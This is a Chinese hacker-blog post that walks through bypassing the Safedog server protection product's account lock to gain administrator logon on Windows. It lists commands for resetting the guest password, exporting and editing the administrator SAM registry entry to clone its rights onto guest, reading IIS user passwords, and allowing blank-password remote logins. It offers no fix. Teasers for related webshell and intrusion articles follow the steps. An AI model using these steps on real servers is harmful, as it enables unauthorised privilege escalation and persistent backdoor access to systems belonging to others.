绕过安全狗用户限制提权

hacker5年前黑客文章994
简要描述:

你还在为有安全狗而不能添加用户而烦恼么?那快来看~只需三步,在最新服务器安全狗4.0.05221账号保护全开的状态下,我是如何用guest获取登陆权限的.前提是要有提权exp哦~

详细说明:

服务器安全狗,在账户保护全开的状态下,是不可以添加用户的,但是并没有限制查看和修改密码的权限,这个是不容否认的,就算不允许修改密码,也可以读出iis用户密码明文,那么安全狗账户限制就如同虚设~

打狗棍法之一式
首先,用guest,演示一下,具体操作是通过注册表,篡改sam下用户的F值,使其达到管理权限.

首先,你必须有提权的exp,使自己达到system权限,大家都知道,administrator对应值是1F4,GUEST是1F5,如果有例外,下面会讲到。

下面是步骤:

1.使用net1 user guset 1 ,将guest密码重置为1,无需过问是否禁用

2.reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "x:\1.reg"


导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。

3.使用regedit /s x:/1.reg 导入注册表就可以使用,guest 密码 1登陆了。

安全狗说:账户保护全开的情况下,如果不能更改密码呢?!

再打狗棍法第二式如果真的不能更改密码呢?则使用vbs查看iis用户密码,再使用
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用户名" "x:\2.reg"

查看其对应值,再重复以上第二步和第三步,使用查看到的明文密码登陆安全狗又说:

果不允许修改密码,iis用户是禁止登陆远程桌面的呢?
如:打狗棍法第三式
对啊,我们该怎么办?继续听我说,大家都知道guest是空密码,那我们就使用空密码登陆。
执行
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f


修改limitblankpassworduse值为1,重复上面第二第三步骤,继续登陆。

oh ye~


漏洞证明:

修复方案:

你们更专业。


标签: 黑客技术

相关文章

网站渗透思路全方面总结

针对新手写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。 (一)针对网...

服务器提权之webshell提权总结

服务器提权之webshell提权总结

服务器提权之webshell提权的一些经验总结。 第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\Applic...

谁能找到免费黑客人员联系方式?求告知黑客联系方式

在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...

discuz伪静态设置方法

discuz伪静态设置方法

首先 进入后台-全局-SEO设置-URL静态化 如图 接着打开:查看当前的Rewrite规则,下载合适规则 <?xml version="1.0" encodin...

Nikto网址漏洞扫描器

Nikto网址漏洞扫描器

什么叫Nikto网址漏洞扫描器? 一个开源系统的Web服务端扫描枪,Nikto对超出6700个潜在性的风险文档开展检测,并在Web服务端上程序执行。它还致力于查验超出1250个落伍的网络服务器版本号...

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

大家第六课讲了,怎样把内部网的的一台设备的端口转发出去,而且明确提出一个难题,假如内部网的一台设备上不了网,可否把它的端口转发出去?回答是能的,用EarthWorm或端口转发专用工具lcx都能够保证...